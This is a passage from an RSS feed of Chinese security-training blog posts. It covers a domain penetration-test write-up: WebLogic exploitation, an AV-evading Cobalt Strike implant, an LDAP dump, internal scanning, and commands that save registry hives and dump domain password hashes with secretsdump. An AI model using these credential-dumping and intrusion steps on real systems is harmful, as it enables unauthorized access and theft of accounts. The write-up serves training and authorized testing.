Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">  reg save hklm\system system<br/>  reg save hklm\security security<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001895" data-w="787" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.08259212198221093" src="https://wechat2rss.xlab.app/img-proxy/?k=a74b3d8e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpTDgWPwzn3Re2V6EtR1qZt9qAqhQItMQgBb3P6PQ2N5BVq5eiaLdFlmg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">使用impacket下的secretsdump.py 解hash</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">python secretsdump.py -ntds <span style="color: rgb(152, 195, 121);line-height: 26px;font-size: 24px;">&#34;C:\ntds\ntds.dit&#34;</span> -security <span style="color: rgb(152, 195, 121);line-height: 26px;font-size: 24px;">&#34;C:\ntds\SECURITY&#34;</span> -system <span style="color: rgb(152, 195, 121);line-height: 26px;font-size: 24px;">&#34;C:\ntds\SYSTEM&#34;</span> <span style="color: #e6c07b;line-height: 26px;">local</span><br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">最后成功获取当前域控中所有域账户和密码</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001898" data-ratio="0.513840830449827" data-w="" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" src="https://wechat2rss.xlab.app/img-proxy/?k=973868c7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpV45m8zTst68pFlMTabltwPpibhOoFic5Sm59vhGksLMR0r1fWNRcAwwQ%2F640%3Fwx_fmt%3Dpng"/></figure></section><p><br/></p><p><br/></p><p><span style="font-size: 18px;"><strong>欢迎咨询：</strong></span><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-fileid="100001413" data-galleryid="" data-ratio="1.3936170212765957" data-s="300,640" style="" data-type="png" data-w="564" src="https://wechat2rss.xlab.app/img-proxy/?k=e9207b1f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGnzia9FAtMgeVYJQDibUw6M1Uu0iaB14smHeX2mWfPbc7l4pCZLqokCmiaiaFiavIianxCosOicvZUAUluw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p>



<p><a href="2247485568">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=bcbde641&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485568%26idx%3D1%26sn%3D80762499286b0f59c962ceb83c5d2fe3%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 27 Oct 2021 14:01:00 +0800</pubDate>
    </item>
    <item>
      <title>一次域渗透测试过程</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485511&amp;idx=1&amp;sn=087e7f37e9044fdf103a1064aedee0f2</link>
      <description>本文来自宽字节安全第一期学员zy投稿。第二期线下培训预计十一月底开班，欢迎咨询。0x01前期ｗｅｂ打点接到某</description>
      <content:encoded><![CDATA[<p>
原创 <span>zy</span> <span>2021-10-23 13:03</span> <span style="display: inline-block;"></span>
</p>

<p>本文来自宽字节安全第一期学员zy投稿。第二期线下培训预计十一月底开班，欢迎咨询。0x01前期ｗｅｂ打点接到某</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=cb6872e3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IJPLfFaCcVfUl0fAOzGicibzZKgZFuaO6icY1l1Gw6g6xJFa7CS2tKOwyw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span><span style="outline: 0px;max-width: 100%;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 20px;text-align: left;text-decoration: underline;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span data-raw-text="本" data-textnode-index="0" data-index="0" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">本</span><span data-raw-text="文" data-textnode-index="0" data-index="1" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">文</span><span data-raw-text="来" data-textnode-index="0" data-index="2" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">来</span><span data-raw-text="自" data-textnode-index="0" data-index="3" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">自</span><span data-raw-text="宽" data-textnode-index="0" data-index="4" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">宽</span><span data-raw-text="字" data-textnode-index="0" data-index="5" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">字</span><span data-raw-text="节" data-textnode-index="0" data-index="6" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">节</span><span data-raw-text="安" data-textnode-index="0" data-index="7" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">安</span><span data-raw-text="全" data-textnode-index="0" data-index="8" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">全</span><span data-raw-text="第" data-textnode-index="0" data-index="9" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">第</span><span data-raw-text="一" data-textnode-index="0" data-index="10" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">一</span><span data-raw-text="期" data-textnode-index="0" data-index="11" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">期</span><span data-raw-text="学" data-textnode-index="0" data-index="12" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">学</span><span data-raw-text="员" data-textnode-index="0" data-index="13" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">员zy</span></strong></span><span style="outline: 0px;max-width: 100%;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 20px;text-align: left;text-decoration: underline;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span data-raw-text="投" data-textnode-index="2" data-index="18" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">投</span><span data-raw-text="稿" data-textnode-index="2" data-index="19" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">稿</span><span data-raw-text="。" data-textnode-index="2" data-index="20" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">。</span><span data-raw-text="第" data-textnode-index="2" data-index="21" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">第</span><span data-raw-text="二" data-textnode-index="2" data-index="22" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">二</span><span data-raw-text="期" data-textnode-index="2" data-index="23" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">期</span><span data-raw-text="线" data-textnode-index="2" data-index="24" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">线</span><span data-raw-text="下" data-textnode-index="2" data-index="25" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">下</span><span data-raw-text="培" data-textnode-index="2" data-index="26" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">培</span><span data-raw-text="训" data-textnode-index="2" data-index="27" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">训</span><span data-raw-text="预" data-textnode-index="2" data-index="28" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">预</span><span data-raw-text="计" data-textnode-index="2" data-index="29" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">计</span><span data-raw-text="十" data-textnode-index="2" data-index="30" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">十</span><span data-raw-text="一" data-textnode-index="2" data-index="31" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">一</span><span data-raw-text="月" data-textnode-index="2" data-index="32" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">月</span><span data-raw-text="底" data-textnode-index="2" data-index="33" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">底</span><span data-raw-text="开" data-textnode-index="2" data-index="34" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">开</span><span data-raw-text="班" data-textnode-index="2" data-index="35" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">班</span><span data-raw-text="，" data-textnode-index="2" data-index="36" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">，</span><span data-raw-text="欢" data-textnode-index="2" data-index="37" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">欢</span><span data-raw-text="迎" data-textnode-index="2" data-index="38" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">迎</span><span data-raw-text="咨" data-textnode-index="2" data-index="39" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">咨</span><span data-raw-text="询" data-textnode-index="2" data-index="40" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">询</span><span data-raw-text="。" data-textnode-index="2" data-index="41" style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">。</span></strong></span></h2><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;">0x01前期ｗｅｂ打点</h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">接到某授权渗透项目：端口扫描发现7001端口，访问该页面发现是weblogic报错页面。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001817" data-w="1007" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.6415094339622641" src="https://wechat2rss.xlab.app/img-proxy/?k=4f3caaeb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IbELKDqcicbeiaF7JwzhcwSp30Q1dlsMfR1ySAtOIpFZBJrjqKHdGxQgA%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">目录扫描发现uddiexplorer目录，验证是weblogic应用指纹。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001818" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5453703703703704" src="https://wechat2rss.xlab.app/img-proxy/?k=aa57bd77&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IyHia93kx8RwraA9Jv7BoSDpBS5hNKibcrUhKS5RLB9Og26p560RpWPNg%2F640%3Fwx_fmt%3Dpng"/></figure><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span>0x02 打点</h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1、使用weblogic漏洞利用工具进行打点。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001815" data-w="522" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.4061302681992337" src="https://wechat2rss.xlab.app/img-proxy/?k=d2a30da7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9Ib9qgzGgSjeRtibibNEm63MMYkxdEFPjt47d4FOIVK4LI8qoiaKptNEAxA%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001814" data-w="551" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.426497277676951" src="https://wechat2rss.xlab.app/img-proxy/?k=67f05484&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9I7ckObweua7nO9jwiaiaIW2BvBLibibY6xAfic8yPn5QIKwvLSgUabZPpm4A%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">发现目标系统是Windows系统。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">2、查看系统的具体版本，是否出网，是工作组环境还是域环境</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9GTp04P7sKTWFw8YJZGzFa6qlZbpNhGW8iciaiaYYwbibDCLoMktqXlYBjIBv93kYxAorwyhpqkwfibxiaCt8UyH5upI/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">wmic os get name&amp;&amp;wmic COMPUTERSYSTEM get domain&amp;&amp;ping 8.8.8.8<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001816" data-w="533" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.924953095684803" src="https://wechat2rss.xlab.app/img-proxy/?k=12d0e670&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IFFNehmOrxgZzIuO24Fmc7xef4VYlERbXXkvM9gn6Dmn9BbtSWSR98w%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">目标是一台2012 R2的电脑，在域内环境，可出网。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">3、判断是否存在杀软。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><img data-fileid="100001823" data-w="388" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="1.5206185567010309" src="https://wechat2rss.xlab.app/img-proxy/?k=9c173e0b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IkykiaOWgFb6sJBg4nFjTr9zGUvaJMiaj86khF80ahwfaJRicrbNicUYh8w%2F640%3Fwx_fmt%3Dpng"/>使用在线的杀软识别没有检测出来，后来查询到Pxxx 是某厂商款杀软的进程。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span>0x03 上线</h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1、准备免杀马。直接掏出免杀马，由于目标机器出网，主动下载构造的免杀马落到目标机器上。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001822" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.4074074074074074" src="https://wechat2rss.xlab.app/img-proxy/?k=f539faae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IVExaxz5nRIE3fUO3dKcGS47VoGc2icKhO96l7iaYxYHe7jpW6rC8DhpA%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">下载成功后运行让目标上线到自己的CS。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001819" data-w="587" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5689948892674617" src="https://wechat2rss.xlab.app/img-proxy/?k=c7fe2a2c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IGcSP9icVKeomlx0B8snUHm1F6IXPthXJjfCW2GUAcBJwbFOiaOevG0CQ%2F640%3Fwx_fmt%3Dpng"/></figure><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: none;"></span>0x04内网渗透</h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1、内网信息收集</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">域内信息收集把域内的信息收集的足够充足，然后进行移动横向。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1、Dump LDAP</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">执行whoami /all查看当前用户</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001821" data-w="840" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.7452380952380953" src="https://wechat2rss.xlab.app/img-proxy/?k=4a8459c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IYUgEXsdzE7I6byn8fpcFXxm6nA4V5B3NczOUAHGK3AapggY8YRVT5g%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">发现是域用户。前面判断是不是域的时候，已经得知域的名字，所以现在可以确实是域成员登录，在域内的成员都是可以连接到 LDAP。通过拉取LDAP到本地后可以清晰的看到当前域的OU和组，查看域控，域管理员信息。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">dump LDAP的两种方式：</p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">使用域成员的账号和密码登录 ADExplorer软件，然后再进行保存。</section></li></ol><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">使用这个方法的前提是需要代理到本地，需要知道域成员的密码或者hash</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001820" data-w="580" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.9724137931034482" src="https://wechat2rss.xlab.app/img-proxy/?k=c1b6e66c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9I64snwojVvxJRdy4ZBwsKsfnUYOHeFMZLxGcoDcD6OwL6iankYyVJbFQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001824" data-w="399" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="1.2431077694235588" src="https://wechat2rss.xlab.app/img-proxy/?k=36215920&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9I3d8glYiac9uicvGiaf9VcLuxTv9nIL9fdViaj1FcSkGjQVSuV5YoG09bVQ%2F640%3Fwx_fmt%3Dpng"/></figure><ol start="2" data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">需要把ADExplorer软件上传到目标机器上面，然后执行命令进行导出。</section></li></ol><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/icFTnRoibgibp9GTp04P7sKTWFw8YJZGzFa6qlZbpNhGW8iciaiaYYwbibDCLoMktqXlYBjIBv93kYxAorwyhpqkwfibxiaCt8UyH5upI/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat rgb(40, 44, 52);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">ADExplorer.exe -snapshot <span style="color: #98c379;line-height: 26px;">&#34;&#34;</span> result.dat /accepteul  <br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001825" data-ratio="0.48703703703703705" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=679761ea&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IwS8SmCvOKRx7Om9yicx5LIpw4IrFveyHlJ8WNIhatPH0Sj5jVBPXegw%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001826" data-ratio="0.8071065989847716" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="985" src="https://wechat2rss.xlab.app/img-proxy/?k=1cec5e23&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IUhPmZnmTczYPqBLmToqokl64Hdl7FOyzBiaoruyD5umQFlicR7SakFmQ%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">2、端口扫描</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001827" data-w="794" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.9093198992443325" src="https://wechat2rss.xlab.app/img-proxy/?k=6f50fe4e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IF2otUJhILKwAiaYI3sDiaZU7P9MR7oh0z5O0NXTctSQ05pgyhxYicptSQ%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">通过portscan扫描端口定位到 开放443 135 端口的机器，也可以使用fscan 去扫描整个内网，但是动静太大。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">192.168.205网段只有一台开放 445，135端口，这台可以横向的机器同时开放了 88，389 端口，一般只有域控会开放这两个接口。和LDAP 信息进行对比确定域控的名字是一致的。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001828" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.21666666666666667" src="https://wechat2rss.xlab.app/img-proxy/?k=220c71fe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9I6acpcJQdsHLVWSlJuicvnDib9lvXmq9b8f4Z1EFQkzpIAVLrJZsMlvicg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">3、LDAP 查看域内基本信息</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">把导出的 LDAP 信息下载到本地然后查找这个域里的域控，域管理员。查找到域控</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">是一台 server 2016 ，主机名是 server2016。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001833" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5787037037037037" src="https://wechat2rss.xlab.app/img-proxy/?k=a46eb59d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IJCTOsnUBRBevstibwWoaUZwBaqVR0RCWy9uBlzAEaiacia1NpHu6EOHGw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">查找域内管理员</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001830" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.32314814814814813" src="https://wechat2rss.xlab.app/img-proxy/?k=006bc55b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IjQ3hn8ibLKGztWpjpcS06libQXlVncjlRaY5H5LdC2Edw6EHq00GXh5Q%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001829" data-w="1033" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5237173281703775" src="https://wechat2rss.xlab.app/img-proxy/?k=b62ef529&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IBWJrIPcgibibJgqTianUC1UIxZ5YUCncjc0iaZu02ibUxhr49kp6yu7hlQA%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">域内的所有机器通过LDAP信息，可以发现这个域内有很多Windows7 的机器，甚至还有Xp的电脑。这也为拿下这个域提供了更多选择，比如 MS17-010。</p><figure 